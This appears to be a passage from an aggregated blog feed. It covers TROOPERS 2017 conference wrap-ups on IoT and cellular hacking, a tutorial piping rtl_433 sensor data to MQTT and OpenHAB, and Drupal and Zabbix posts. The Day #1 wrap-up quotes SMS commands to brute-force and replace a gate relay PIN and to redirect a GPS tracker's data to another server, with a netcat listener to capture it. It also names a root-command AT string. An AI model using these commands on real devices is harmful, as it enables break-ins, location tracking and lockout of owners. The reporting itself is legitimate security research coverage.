  • Monitor
  • Profit

To achieve this, he used Bro. Bro is some kind of Swiss army knife for IDS environments. Matthew gave a quick introduction to the tool and, more precisely, focused on Bro's scripting capabilities. Logs produced by Bro are also easy to parse. The tool developed by Matthew implements a simple baseline script: it collects all connections to IP addresses / ports and logs what is NOT known. The tool is called Bropy and should be available soon after the conference. A nice demo was performed. I really liked the idea behind this tool, but it should be improved and features added to be usable in big environments. I would recommend having a look at it if you need to build a network activity baseline!
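To make the baseline idea a bit more concrete: conceptually it boils down to remembering which (IP, port) pairs were seen during a learning period and flagging anything new afterwards. A toy illustration (plain C++, nothing to do with Bro or Bropy themselves; the one-pair-per-line input format is my own assumption):

#include <fstream>
#include <iostream>
#include <set>
#include <string>

// Toy network baseline: learn "ip port" pairs from one file, then report
// anything in a second file that was never seen during learning.
int main( int argc, char *argv[] )
{
    if ( argc != 3 ) {
        std::cerr << "usage: baseline <learning-file> <live-file>\n";
        return 1;
    }

    std::set<std::string> known;
    std::string ip, port;

    std::ifstream learn( argv[1] );
    while ( learn >> ip >> port )
        known.insert( ip + ":" + port );          // build the baseline

    std::ifstream live( argv[2] );
    while ( live >> ip >> port )
        if ( !known.count( ip + ":" + port ) )
            std::cout << "NEW: " << ip << ":" << port << "\n";   // not in the baseline

    return 0;
}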

The day ended with the classic social event: local food, drinks and nice conversations with friends, which is priceless. I have to apologize for the delay in publishing this wrap-up. Complaints can be sent to Sn0rkY! 😉

[The post TROOPERS 2017 Day #3 Wrap-Up has been first published on /dev/random]

March 21, 2017

This is my wrap-up of the 2nd day of "NGI" at TROOPERS. My first choice for today was "Authenticate like a boss" by Pete Herzog. This talk was less technical than expected but interesting. It focussed on a complex problem: identification. It's not only relevant for users but for anything (a file, an IP address, an application, …). Pete started by providing a definition: authentication is based on identification and authorisation. But identification can be easy to fake. A classic example is the hijacking of a domain name by sending a fax with a fake ID to the registrar – yes, some of them still use fax machines! Identification is used all the time to verify the identity of somebody before giving access to something. It's not only based on credentials or a certificate.

Identification is extremely important. You have to distinguish the good from the bad at any time: not only people but files, IOCs, threat intelligence actors, etc. For files, metadata can help with identification. Another example reported by Pete: the attribution of an attack. We cannot be 100% confident about the person or the group behind an attack. The next generation Internet needs more and more identification, especially with all those IoT devices deployed everywhere. We don't even know what the device is doing. Often, the identification process is not successful. How many times did you say "hello" to somebody on the street or while driving who turned out to be the wrong person? Why? Because we (as well as objects) are changing. We are getting older, wearing glasses, etc… Every interaction you have in a process increases your attack surface by the same amount as one vulnerability. What is more secure: letting a user choose his password, or generating a strong one for him? He won't remember the generated one and will write it down somewhere. In the same way, what's best: a password or a certificate? An important concept explained by Pete is "intent". The problem is to have a good idea of the intent (from 0 – none – to 100% – certain).

Example: if an attacker is filling your firewall state table, is it a DoS attack? If somebody performs a traceroute to your IP addresses, is it foot-printing? Can a port scan automatically be categorized as hunting? And will a vulnerability scan immediately be followed by an exploitation attempt? Not always… It's difficult to predict a specific action. To conclude, Pete mentioned machine learning as a tool that may help with indicators of intent.

After an expected coffee break, I switched to the second track to follow "Introduction to Automotive ECU Research" by Dieter Spaar. ECU stands for "Electronic Control Unit". It's a kind of brain present in modern cars that helps control the car's behaviour and all its options. The idea for the research came after the problem BMW faced with the unlocking of their cars. Dieter's motivations were multiple: engine tuning, speedometer manipulation, ECU repair, information privacy (what data does a car store?), the "VW scandal" and eCall (emergency calls). Sometimes, features are just a question of ECU configuration: they are present but not activated. Also, from a privacy point of view, what do infotainment systems collect from your paired phone? How much data is kept by your GPS? ECUs depend on the car model and options. In the picture below, yellow blocks are activated ECUs, the others (grey) are optional (this picture is taken from an Audi A3 schema):

Audi A3 ECU

Interaction with the ECU is performed via a bus. There are different bus systems: the best known is CAN (Controller Area Network), then MOST (Media Oriented System Transport), FlexRay, LIN (Local Interconnected Network), Ethernet or BroadR-Reach. Interesting fact: some BMW cars have an Ethernet port to speed up upgrades of the infotainment system (like GPS maps), since Ethernet provides more bandwidth to upload big files. ECU hardware is based on typical microcontrollers like Renesas, Freescale or Infineon. Infotainment systems run on ARM, sometimes x86, with QNX, Linux or Android. A special requirement is to provide a fast response time after power-on. Dieter showed a lot of pictures of ECUs in which you can easily identify the main components (radio, infotainment, telematics, etc). Many of them are manufactured by Peiker. This was a very quick introduction, but it demonstrated that there is still room for plenty of research projects with cars. During the lunch break, I had an interesting chat with two people working at Audi. Security is clearly a hot topic for car manufacturers today!

For the next talk, I switched again to the other track and attended "PUF 'n' Stuf" by Jacob Torrey & Anders Fogh. The idea behind this strange title was "getting the most out of the digital world through physical identities". The title comes from a US TV show popular in the 60's. Today, in our ultra-connected digital world, we are moving our identity away from the physical world and it becomes difficult to authenticate somebody. We are losing the "physical" aspect. Humans can quickly spot an imposter just by looking at a picture and after a simple conversation, even if they don't personally know the person. But authenticating people via a simple login/password pair is difficult in the digital world. The idea of Jacob & Anders was to bring strong physical identification into the digital world. The concept is called "PUF", or "Physically Uncloneable Function". To achieve this, they explained how to implement a challenge-response function for devices that should return responses that are as non-volatile as possible. This can be used to attest the execution state or to generate device-specific data. They reviewed examples based on SRAM, EEPROM or CMOS/CCD. The last example is interesting: the technique is called PRNU and can be used to uniquely identify image sensors. It is often used in forensic investigations to link a picture to a camera. You can see such a PUF as a second authentication factor. But there are caveats, like a lack of proper entropy or PUF spoofing. An interesting idea, but not easy to implement in practical cases.

After the lunch, Stefan Kiese had a two-hour slot to present "The Hardware Striptease Club". The idea of the presentation was to briefly introduce some components that we find today in our smart houses and see how to break them from a physical point of view. Stefan briefly explained the methodology for approaching those devices. When you do this, never forget the potential impact: loss of revenue, theft of credentials, etc… or worse, life (pacemakers, cars). Some of the reviewed victims:

  • TP-Link NC250 (Smart home camera)
  • Netatmo weather station
  • BaseTech door camera
  • eQ-3 home control access point
  • Easy home wifi adapter
  • Netatmo Welcome

He gave an electronics crash course but also insisted on the risks of playing with mains-powered devices! Then, people were able to open and disassemble the devices to play with them.

I didn't attend the second hour because another talk looked interesting: "Metasploit hardware bridge hacking" by Craig Smith. He works at Rapid7 and plays with all "moving" things, from cars to drones. To interact with those devices, a lot of tools and gadgets are required. The idea was to extend the Metasploit framework to be able to pentest these new targets. With an estimated 20.8 billion connected IoT devices (source: Gartner), pentesting projects around IoT devices will become more and more frequent. Many tools are required to test IoT devices: RF transmitters, USB fuzzers, RFID cloners, JTAG devices, CAN bus tools, etc. The philosophy behind Metasploit remains the same: it is based on modules (exploits, payloads, shellcodes). New modules are available to access relays which talk directly to the hardware. Example:

msf> use auxiliary/server/local_hwbridge

A Metasploit relay is a lightweight HTTP server that just makes JSON translations between the bridge and Metasploit.

Example: an ELM327 diagnostic module can be used via serial USB or Bluetooth. Once connected, all the classic framework features are available as usual:

./tools/hardware/elm327_relay.rb

Other supported relays are RF transmitters or Zigbee. This was an interesting presentation.

For the last time slot, there were two talks: one about vulnerabilities in TP-Link devices and one presented as "Looking through the web of pages to the Internet of Things". I chose the second one, presented by Gabriel Weaver. The abstract did not describe the topic properly (or I did not understand it), but the presentation was a review of the research performed by Gabriel: "CPTL" or "Cyber-Physical Topology Language".

That closes the 2nd day. Tomorrow will be dedicated to the regular tracks. Stay tuned for more coverage.

[The post TROOPERS 2017 Day #2 Wrap-Up has been first published on /dev/random]

March 20, 2017

I'm in Heidelberg (Germany) for the 10th edition of the TROOPERS conference. The regular talks are scheduled on Wednesday and Thursday. The first two days are reserved for trainings and a pre-conference event called "NGI", for "Next Generation Internet", focusing on two hot topics: IPv6 and IoT. As said on the website: "NGI aims to provide discussion on how to secure these core technologies by bringing together practitioners from this space and some of the smartest researchers of the respective fields". I initially planned to attend talks from both worlds, but I stayed in the "IoT" track because many talks were interesting.

The day started with a keynote by Steve Lord: "Of Unicorns and Replicants". Steve flagged his keynote as a "positive" talk (usually, we tend to present negative stuff). It started with some facts like "The S in IoT stands for Security" and a recap of IoT history. This is clearly not a new idea: the first connected device was a Coca-Cola machine that was reachable via finger in… 1982! Who remembers this old-fashioned protocol? In 1985 came the first definition of "IoT": it is the integration of people, processes and technology with connectable devices and sensors to enable remote status monitoring. In 2000, LG presented its very first connected fridge. 2009 was a key year with the explosion of crowdfunding campaigns. Indeed, many projects were born thanks to the financial participation of many people. It was a nice way to bring ideas to life. In 2015, Vizio smart TVs started to watch you. Of course, Steve also talked about the story of St. Jude Medical and their bad pacemakers. Common IoT problems are: botnets, endpoints, overreach (probably the biggest problem) and availability (remember the outage that affected Amazon a few days ago?). The second part of the keynote was indeed positive, and Steve reviewed the differences between 2015 and 2017. In the past, cloud solutions were not so mature, there were communication issues, little open guidance and unrealistic expectations. People learn from mistakes, and some companies don't want nightmare stories like others had, so they are investing in security. So, yes, things are getting (a little bit) better because more people are addressing security issues.

The first talk was "IoT hacking and Forensic with 0-day" by Moonbeom Park & Soohyun Jin. More and more IoT devices have been involved in security incidents; Mirai is one of the latest examples. To address this problem, the speakers explained their process based on the following steps: search for IoT targets, analyze the filesystem and vulnerabilities, attack and exploit, analyze the artefacts, install a RAT and control it using a C&C, then perform incident response using forensic skills. The example they used was a vacuum robot with a voice recording feature. The first question is just… "why?". They explained how to compromise the device, which was, at the start, properly hardened. But it was possible to attack the protocol used to configure it: some JSON data was sent in clear text with the wireless configuration details. Once the robot was reconfigured to use a rogue access point, root access on the device was granted. That's nice, but how to control the robot, its camera and microphone? The idea was to turn it into a spying device. They explained how to achieve this and played a nice demo:

Vacuum robot spying device

So, why do we need IoT forensics? IoT devices can be involved in incidents. Issues? One of them is the way data is stored: there is no hard disk, but flash memory. Linux remains the most used OS on IoT devices (73% according to the latest IoT developers survey). It is important to be able to extract the filesystem from such devices to understand how they work and to collect logs. Usually, filesystems are based on SquashFS and UBIFS. Tools were presented to access those data directly from Python, for example the ubi_reader module. Once the filesystem details are accessible, the forensic process remains the same.

The next talk was dedicated to SDR (Software Defined Radio) by Matt Knight & Marc Newlin from Bastille: "So you want to hack radios?". The idea behind this talk was to open our eyes to all the connected devices that implement radios. Why should we care about radio communications? Not only are they often insecure, they are deployed everywhere. They are also built on compromises: size and cost constraints, weak batteries, challenging deployment scenarios and, once in the wild, they are difficult to patch. Matt and Marc explained during the talk how to perform reverse engineering. There are two approaches: hardware and software defined radio. They reviewed the pros & cons. How to reverse engineer a radio signal? Configure yourself as a receiver and try to map symbols. This is a five-step process:

  • Identify the channel
  • Identify the modulation
  • Determine the symbol rate
  • Synchronize
  • Extract symbols

In many cases, OSINT is helpful to learn how a device works (find online documentation). A lot of information is publicly available (example: on the FCC website – just check the FCC ID on the back of the device to get interesting info). They briefly introduced RF concepts, then the reverse engineering workflow. To illustrate this, they walked through different scenarios:

  • A Z-Wave home automation protocol
  • A door bell (capture the button info, then replay it to make the doorbell ring, of course)
  • An HP wireless keyboard/mouse

After the lunch, Vladimir Wolstencroft presented "SIMBox Security: Fraud, Fun & Failure". This talk was tagged TLP:RED, so no coverage, but very nice content! It was one of my favourite talks of the day.

The next one was about the same topic: "Dissecting modern cellular 3G/4G modems" by Harald Welte. This talk is the result of research conducted by Harald. His company was looking for a new M2M ("Machine to Machine") solution. They looked for interesting devices and started to see what was in the box. Once a good candidate was found (the EC20 from Quectel), they started a security review and, guess what, they made some nice findings. First, the device contains some Linux code. Based on this, the manufacturer has to respect the GPL and disclose the modified source code (it took a long time to get the information from Quectel). But why is Linux installed on this device? For Harald, it just increases the complexity. Here is a proof with the slide explaining how the device is rebooted:

Reboot Process

Crazy isn’t it? Another nice finding was the following AT command:

AT+QLINUXCMD=

It allows sending Linux commands to the device in read/write mode and as root. What else?

The last talk, "Hacks & case studies: Cellular communications", was presented by Brian Butterly. Brian's motto is "to break things you must understand how they work". The first step: read as much as possible, then build your lab to play with the selected targets. Many IoT devices today use GSM networks to let their owners interact with them via SMS or calls; others also support TCP/IP communications (data). After a brief introduction to mobile networks and how to deploy your own, an important message from Brian: technically, nothing prevents you from broadcasting valid network IDs (but the law does! :-).

It’s important to understand how a device connects to a mobile network:

  • First, connect to its home network if available
  • Otherwise, do NOT connect to a list of blacklisted networks
  • Then connect to the network with the strongest signal.

If you deploy your own mobile network, you can make target devices connect to it and play MitM. So, what can we test? Brian reviewed different gadgets, how to abuse them and what their weaknesses are.

First case: a small GPS tracker with an emergency button, the Mini A8 (price: 15€). Just send an SMS with "DW" and the device will reply with an SMS containing the following URL:

http://gpsui.net/smap.php?lac=1&cellid=2&c=262&n=23&v=6890 Battery:70%

This is not a real GPS tracker: it returns the operator ("262" is Germany) and cell tower information. If you send "1111", it will enable the built-in microphone. When the SOS button is pressed, a message is sent to the "authorized" numbers. The second case was a gate relay (RTU5025 – 40€). It allows opening a door via SMS or call; it's just a relay, in fact. Send "xxxxCC" (xxxx is the PIN) to unlock the door. Nothing is sent back if the PIN is wrong, which means it's easy to brute-force the device. Even better, once you have found the PIN, you can send "xxxxPyyyy" to replace the PIN xxxx with a new one, yyyy (and lock out the owner!). The next case was the Smanos X300 home alarm system (150€). It can also be controlled by SMS or calls (to arm, disarm and get notifications). Here again, there is a lack of protection: it's easy to get the number and to spoof an authorized number to just send a "1" or "0".

The next step was to check IP communications used by devices like the GPS car tracker (TK105 – 50€). You can change the server using the following message:

adminip 123456 101.202.101.202 9000

And define your own web server to get the device data. More fun, the device has a relay that can be connected to the car oil pump to turn the engine off (if the car is stolen). It also has a microphone and speaker. Of course, all communications occur over HTTP.
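
If you point such a tracker at a box you control, simply listening on the port configured above is enough to watch what it sends (a small sketch; whether you need the -p flag depends on your netcat flavour):

nc -l -p 9000    # traditional netcat; the OpenBSD variant wants: nc -l 9000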

The last case was a Siemens module for PLCs (CMR 2020). It was not perfect but much better than the other devices. For example, passwords are not just 4-digit PIN codes but real alphanumeric passwords.

Two other examples: a SmartMeter sending UDP packets in clear text, with the meter serial number in all packets, and a solar system control box running Windows CE 6.x. Guess what? The only way to manage the system is via Telnet. Who said that Telnet is dead?

It’s over for today. Stay tuned for more news by tomorrow!

[The post TROOPERS 2017 Day #1 Wrap-Up has been first published on /dev/random]

CurrentCost?

CurrentCost is a UK company founded in 2010 which provides home power measuring hardware. Their main product is a transmitter which uses an inductive clamp to measure power usage of your household. On top of that, they also provide Individual Appliance Monitors (IAMs) which sit between your device and the outlet, and measure its power usage.

The transmitters broadcast their findings wirelessly. To display the data, a number of different displays are sold, which can indicate total usage, per-IAM data, trending and even cost if you care to set that up. I myself have the EnviR, which has USB connectivity (with an optional cable) so you can process the CurrentCost data on your computer. Up to 9 IAMs can be connected to the EnviR.

I bought my CurrentCost products over 5 years ago, but it does look like they are still on sale. CurrentCost operates an eBay store where you can buy their hardware if you’re not in the UK.

Important note: Should you decide to acquire any of their IAM hardware, do note that their “EU” IAM plugs are in fact “Schuko” (type F) plugs, as used in Germany and The Netherlands, with side ground contacts instead of a grounding pin. That wouldn’t be so much of an issue, except that they don’t have an accommodating hole for the pin, so they won’t fit standard EU (non-German, non-Dutch, type E) outlets without a converter! The device side is usually fine, as most if not all plugs also support side ground contacts, and if they don’t, at least the lack of a pin does not impede plugging it in.

OpenHAB?

OpenHAB is an open source, Java-powered Home Automation Bus; what this basically means is it’s a centralized hub that can connect to many systems that have found their way into your house, such as your smart TV, your ethernet-capable Audio Receiver, Hue lighting, Z-Wave- or Zigbee-powered accessories, HVAC systems, Kodi, CUPS, and even anything that speaks SNMP or MQTT or Amazon’s Alexa. It’s pretty much fully able to integrate into anything you can throw at it.

If you’re not already using OpenHAB, this post may not be very useful to you… Yet.

MQTT?

MQTT (short for Message Queue Telemetry Transport) is a publish-subscribe-based “lightweight” messaging protocol. In short, you run one (or multiple) MQTT brokers, and clients can then “subscribe” to certain topics (topics being freehand names, pretty much), while other clients, or even the same ones, can “publish” data on those same topics.

MQTT is a quick and elegant solution to have data circulate between different services, over the network or on the local machine – the fact that that data is broadcast over certain topics means multiple listeners (“subscribers”) can all act on that same data being published.
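
As a quick illustration of the publish/subscribe model (a minimal sketch: it assumes the mosquitto-clients tools, a broker running on localhost, and a made-up topic name):

~# mosquitto_sub -h localhost -t 'sensors/#' &
~# mosquitto_pub -h localhost -t 'sensors/livingroom/power' -m '876'
876

The subscriber immediately prints whatever is published under the sensors/ tree; this is exactly the mechanism used further down to get the radio data into OpenHAB.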

OpenHAB supports MQTT in both directions – it can listen to incoming topics, or broadcast certain things over MQTT as well.

The configuration below assumes you already have an MQTT broker to publish the radio messages to; setting up Mosquitto or similar is out of scope for this article.

Getting data out of CurrentCost

The EnviR outputs the following string regularly (every 6 seconds) over its USB serial port:

<msg><src>CC128-v1.48</src><dsb>00012</dsb><time>22:18:34</time><tmpr>24.9</tmpr><sensor>0</sensor><id>02015</id><type>1</type><ch1><watts>00876</watts></ch1></msg>

This is a line of data reporting power data sent by sensor ID 2015 (every sensor has its own 12-bit ID), of type 1 (this is either the main unit or an IAM), reporting 876W on the first channel. The <tmpr> field is indeed a temperature reading: it is powered by a temperature sensor inside the EnviR and simply measures the temperature where your display is located.
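
If you just want to eyeball the live readings, something like the following does the job (a rough sketch: the device node and the 57600 baud rate are assumptions, check dmesg and the EnviR documentation for your setup):

~# stty -F /dev/ttyUSB0 57600 raw -echo
~# grep --line-buffered -o '<watts>[0-9]*</watts>' /dev/ttyUSB0 | sed -u 's/[^0-9]//g'
# prints one wattage reading per received message, e.g. every 6 seconds per sensor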

Back in 2012, I wrote a set of PHP scripts parsing this data and putting it into separate files in /tmp, with a separate script then throwing this data into RRD files every minute to be visualised in graphs. I never published it because to be frank it was a bit of an ugly hack. However it did work, and I had perfect visibility into when my 3 monitors went into standby, when the TV/Home theater amplifier was on, etc.

After getting a taste of this, spurred on by JP, I dived into Home Automation and ended up using OpenHAB. For years I’ve “planned” to write a CurrentCost binding for OpenHAB, so it would natively support the XML serial protocol, and just read out everything automatically. I never got around to figuring out how to create an OpenHAB binding though, so my stats were separate in those RRD files for years. When I moved, I didn’t even reinstall the CurrentCost sensors, as I was already using Z-Wave based power sensors for most things I wanted to measure.

In the meanwhile I also encountered current-cost-forwarder which listens for the XML data and sends it over to an MQTT broker. That did alleviate the need for a dedicated binding, but I never got around to trying this out, so I can’t tell you how well it works.

The magic of RTLSDR

RTLSDR is a great software defined radio (SDR) based on very cheap Realtek RTL28xx chips, originally meant to receive DVB-T broadcasts. This means you can pretty much listen in on any frequency between ~22MHz and ~1100MHz, including FM radio, ADS-B aircraft data, and many others. And by cheap, I do mean cheap: you can find RTLSDR-compatible USB dongles on eBay for 5€ or less!

CurrentCost transmitters use the 433MHz frequency, like many other home devices (car keys, wireless headphones, garage openers, weather stations, …). As I was playing around with the rtl_433 tool, which uses RTLSDR to sniff 433MHz communications, I noticed my CurrentCost sensor data passing by as well. That gave me the idea for this system, and the setup in use that led to this blog post.

Additional advantages for this are that you can now use as many IAMs as you want and are no longer limited to 9, and there is no need to have the EnviR connected to one of your server’s USB ports. In fact, you don’t even need the EnviR display at all, and can even drop the base transmitter if you only want to read out IAM data.

As an extra, any other communication picked up by rtl_433 on 433MHz will also be automatically piped into MQTT for consumption by anything else you want to run. If you (or your neighbours!) have a weather station, anemometer or anything else transmitting on 433MHz (and supported by rtl_433), you can consume this data in OpenHAB just as well!

Sniffing the 433MHz band

First off, let’s install rtl_433:

~# apt-get install rtl-sdr librtlsdr-dev cmake build-essential
~# git clone https://github.com/merbanan/rtl_433.git
Cloning into 'rtl_433'...
remote: Counting objects: 5722, done.
(...)
Checking connectivity... done.
~# cd rtl_433/
~/rtl_433# mkdir build
~/rtl_433# cd build
~/rtl_433/build# cmake ..
-- The C compiler identification is GNU 4.9.2
(...)
-- Build files have been written to: /root/rtl_433/build
~/rtl_433/build# make
~/rtl_433/build# make install

Once it’s been installed, let’s do a test run. If you have CurrentCost transmitters plugged in, you should see their data flash by. Unfortunately, nobody in my neighbourhood seems to have any weather stations or outdoor temperature sensors, so only CurrentCost output for me:

~# rtl_433 -G
Using device 0: Generic RTL2832U
Found Rafael Micro R820T tuner
Exact sample rate is: 250000.000414 Hz
Sample rate set to 250000.
Bit detection level set to 0 (Auto).
Tuner gain set to Auto.
Reading samples in async mode...
Tuned to 433920000 Hz.
2017-02-27 17:53:12 : CurrentCost TX
Device Id: 2015
Power 0: 26 W
Power 1: 0 W
Power 2: 0 W

To end the program, press ctrl-C.

What we can see in the output here:

  • Device Id: the same device ID as was reported by the EnviR’s XML protocol. It likely changes when you press the pair button.
  • Power 0: This is the only power entry you’ll see for IAM modules; the base device may also report data for the second and third clamp.

It is possible you see the following error when running rtl_433:

Kernel driver is active, or device is claimed by second instance of librtlsdr.
In the first case, please either detach or blacklist the kernel module
(dvb_usb_rtl28xxu), or enable automatic detaching at compile time.

This means your OS has autoloaded the DVB drivers when you plugged in your USB stick, before you installed the rtl-sdr package. You can unload them manually:

rmmod dvb_usb_rtl28xxu rtl2832

The rtl-sdr package contains a blacklist entry for this driver, so it shouldn’t be a problem anymore from now on. Then, try running the command again.

Relaying 433MHz data to MQTT

Install mosquitto-clients, which provides mosquitto_pub, the tool that will be used to publish data to the broker:

~# apt-get install mosquitto-clients

Next, install the systemd service file which will run the relay for us:

~# cat <<EOF > /etc/systemd/system/rtl_433-mqtt.service
[Unit]
Description=rtl_433 to MQTT publisher
After=network.target
[Service]
ExecStart=/bin/bash -c "/usr/local/bin/rtl_433 -q -F json |/usr/bin/mosquitto_pub -h <your.broker.hostname> -i RTL_433 -l -t RTL_433/JSON"
Restart=always
RestartSec=5
[Install]
WantedBy=multi-user.target
EOF
~# systemctl daemon-reload
~# systemctl enable rtl_433-mqtt

This will publish JSON-formatted messages containing the 433MHz data to your MQTT broker on the RTL_433/JSON topic.

Don’t forget to replace your broker’s hostname on the correct line. I tried to make it use an Environment file first, but unfortunately ran into a few issues using those variables, due to needing to run the command in an actual shell because of the pipe. If you figure out a way to make that work, please do let me know.
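
For what it's worth, here is one untested sketch of an approach that should work: keep the hostname in an environment file and escape the variable with $$ so that it survives systemd's own expansion and is then expanded by bash inside the pipe (plain ${MQTT_HOST}, expanded by systemd itself, should work as well). The file path and variable name here are my own invention:

~# echo "MQTT_HOST=your.broker.hostname" > /etc/default/rtl_433-mqtt

Then, in the [Service] section of the unit file:

EnvironmentFile=/etc/default/rtl_433-mqtt
ExecStart=/bin/bash -c "/usr/local/bin/rtl_433 -q -F json |/usr/bin/mosquitto_pub -h $${MQTT_HOST} -i RTL_433 -l -t RTL_433/JSON"

Run systemctl daemon-reload again after editing the unit.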

See if it works

We can subscribe to the MQTT topic using the mosquitto_sub tool from the mosquitto-clients package:

mosquitto_sub -h <your.broker.hostname> -t RTL_433/JSON

Doing this should yield a number of output lines such as this:

{"time" : "2017-03-19 21:26:25", "model" : "CurrentCost TX", "dev_id" : 2015, "power0" : 0, "power1" : 0, "power2" : 0}

Press Ctrl-C to exit the utility. If this didn’t yield any useful JSON output, check the status of the service with systemctl status rtl_433-mqtt and correct any issues.

Add items to OpenHAB

The following instructions were written for OpenHAB 1.x. Even though OpenHAB 2.x has a new way of adding “things” and “channels”, they work on that version as well – there is no automatic web-based configuration for MQTT items anyway.

Create items such as these in the OpenHAB items file of your choice (where exactly this is depends on your OpenHAB major version and whether you installed using debian packages or from the zip file).

Number Kitchen_Boiler_Power "Kitchen Boiler [%.1f W]" (GF_Kitchen) { mqtt="<[your.broker.hostname:RTL_433/JSON:state:JSONPATH($.power0):.*\"dev_id\" \\: 2015,.*]"}

Replace the dev_id being matched (2015 in the example above) with the ID of your CurrentCost transmitter. As all rtl_433 broadcasts come in on the same topic, a regular expression is used to match a single Device Id. If you want to read another phase, replace power0 by power1 or power2.
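
For instance, a second, hypothetical IAM with device ID 1234 monitoring a washing machine would look like this; only the item name, label, group and dev_id change (the group name here is made up, use one of your own or drop it):

Number Washer_Power "Washing Machine [%.1f W]" (GF_Utility) { mqtt="<[your.broker.hostname:RTL_433/JSON:state:JSONPATH($.power0):.*\"dev_id\" \\: 1234,.*]"}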

If you want to receive other 433MHz broadcasts, you may need to change the regex to make sure it’s only catching CurrentCost sensors – although the dev_id match alone might be enough. Let me know!

Writing informative technical how-to documentation takes time, dedication and knowledge. Should my blog series have helped you in getting things working the way you want them to, or configure certain software step by step, feel free to tip me via PayPal (paypal@powersource.cx) or the Flattr button. Thanks!

March 19, 2017

I published the following diary on isc.sans.org: “Searching for Base64-encoded PE Files“.

When hunting for suspicious activity, it’s always a good idea to search for Microsoft Executables. They are easy to identify: They start with the characters “MZ” at the beginning of the file. But, to bypass classic controls, those files are often obfuscated (XOR, Rot13 or Base64)… [Read more]

[The post [SANS ISC] Searching for Base64-encoded PE Files has been first published on /dev/random]

Almost all of the video recordings from FOSDEM 2017 have been cut, transcoded, and released. There are a handful of talks left to fix up, which will happen no later than next weekend. The weekend after that, we plan to shut down this year's video-processing infrastructure, unless something important pops up. Videos are linked from the individual schedule pages for the talks and the full schedule page. They are mirrored from video.fosdem.org. While all videos have been reviewed by a human before they were released, it remains possible that one or more issues fell through the cracks. Therefore, if you…

March 18, 2017

I published the following diary on isc.sans.org: “Example of Multiple Stages Dropper“.

If some malware samples remain simple (see my previous diary), others try to install malicious files in a smooth way to the victim computers. Here is a nice example that my spam trap captured a few days ago. The mail looks like a classic phishing attempt… [Read more]

[The post [SANS ISC Diary] Example of Multiple Stages Dropper has been first published on /dev/random]

March 17, 2017

It seems to be the new sport of nitwit moronic world leaders like Trump and Erdogan to bash Frau Merkel.

It makes me respect her more.

The YMCA is a leading nonprofit dedicated to strengthening communities through youth development, healthy living and social responsibility. Today, the YMCA serves more than 58 million people in 130 countries around the world. The YMCA is a loose federation, meaning that each association operates independently to best meet the needs of the local community. In the United States alone, there are 874 associations, each with their own CEO and board of directors. As associations vary in both size and scale, each YMCA is responsible for maintaining their own digital systems and tools at their own expense.

In 2016, the YMCA of Greater Twin Cities set out to develop a Drupal distribution, called Open Y. The goal of Open Y was to build a platform to enable all YMCAs to operate as a unified brand through a common technology.

Features of the Open Y platform

Open Y strives to provide the best customer experience for their members. The distribution, developed on top of Drupal 8 in partnership with Acquia and FFW, offers a robust collection of features to deliver a multi-channel experience for websites, mobile applications, digital signage, and fitness screens.

On an Open Y website customers can schedule personal training appointments, look up monthly promotions, or donate to their local YMCA online. Open Y also takes advantage of Drupal 8's APIs to integrate all of their systems with Drupal. This includes integration with Open Y's Customer Relationship Management (CRM) and eCommerce partners, but also extends to fitness screens and wearables like Fitbit. This means that Open Y can use Drupal as a data repository to serve content, such as alerts or program campaigns, to digital signage screens, connected fitness consoles and popular fitness tracking applications. Open Y puts Drupal at the core of their digital platform to provide members with seamless and personalized experiences.

Philosophy of collaboration

The founding principle of Open Y is that the platform adopts a philosophy of collaboration that drives innovation and impact. Participants of Open Y have developed a charter that dictates expectations of collaboration and accountability. The tenets of the charter allow for individual associations to manage their own projects and to adopt the platform at their own pace. However, once an association adopts Open Y, they are expected to contribute back any new features to the Open Y distribution.

As a nonprofit, YMCAs cannot afford expensive proprietary licenses. Because participating YMCAs collaborate on the development of Open Y, and because there are no licensing fees associated with Drupal, the total cost of ownership is much lower than proprietary solutions. The time and resources that are saved by adopting Drupal allows YMCAs around the country to better focus on their customers' experience and lean into innovation. The same could not be achieved with proprietary software.

For example, the YMCA of Greater Seattle was the second association to adopt the Open Y platform. When building its website, the YMCA of Greater Seattle was able to repurpose over a dozen modules from the YMCA of the Greater Twin Cities. That helped Seattle save time and money in their development. Seattle then used their savings to build a new data personalization module to contribute back to the Open Y community. The YMCA of the Greater Twin Cities will be able to benefit from Seattle's work and adopt the personalization features into its own website. By contributing back and by working together on the Open Y distribution, these YMCAs are engaging in a virtuous cycle that benefits their own projects.

The momentum of Open Y

In less than one year, 18 YMCA associations have committed to adopting Open Y and over 22 other associations are currently evaluating the platform. Open Y has created a platform that all stakeholders under the YMCA brand can use to collaborate through a common technology and a shared philosophy.

Open Y is yet another example of how organizations can challenge the prevailing model of digital experience delivery. By establishing a community philosophy that encourages contribution, Open Y has realized accelerated growth, feature development, and adoption. Organizations that are sharing contributions and embracing collaboration are evolving their operating models to achieve more than ever before.

Because I am passionate about the Open Y team's mission and impact, I have committed to be an advisor and sponsor to the project. I've been advising them since November 2016. Working with Open Y is a way for me to give back, and it's been very exciting to witness their progress first hand.

If you want to help contribute to the Open Y project, consider attending their DrupalCon Baltimore session on building custom Drupal distributions for federated organizations. You can also connect with the Open Y team directly at OpenYMCA.org.

Imagine you have a duck. Imagine you have a wall. Now imagine you throw the duck with a lot of force against a wall. Duck typing means that the duck hitting the wall quacks like a duck would.

ps. Replace wall with API and duck with ugly stupid script written by an idiot. You can leave quacks.

March 16, 2017

The post Finding the biggest data (storage) consumers in Zabbix appeared first on ma.ttias.be.

If you run Zabbix long enough, eventually your database will grow to sizes you'd rather not see. And that begs the question: what items are causing the most storage in my Zabbix backend, be it MySQL, PostgreSQL or something else?

I investigated the same questions and found the following queries to be very useful.

Before you start to look into this, make sure you cleanup your database of older orphaned records first, see an older post of mine for more details.

What items have the most value records?

These probably also consume the most diskspace.

For the history_uint table (holds all integer values):

SELECT COUNT(history.itemid), history.itemid, i.name, i.key_, h.host
FROM history_uint AS history
LEFT JOIN items AS i ON i.itemid = history.itemid
LEFT JOIN hosts AS h ON i.hostid = h.hostid
GROUP BY history.itemid
ORDER BY COUNT(history.itemid) DESC
LIMIT 100;

For the history table (holds all float & double values):

SELECT COUNT(history.itemid), history.itemid, i.name, i.key_, h.host
FROM history AS history
LEFT JOIN items AS i ON i.itemid = history.itemid
LEFT JOIN hosts AS h ON i.hostid = h.hostid
GROUP BY history.itemid
ORDER BY COUNT(history.itemid) DESC
LIMIT 100;

For the history_text table (holds all text values):

SELECT COUNT(history.itemid), history.itemid, i.name, i.key_, h.host
FROM history_text AS history
LEFT JOIN items AS i ON i.itemid = history.itemid
LEFT JOIN hosts AS h ON i.hostid = h.hostid
GROUP BY history.itemid
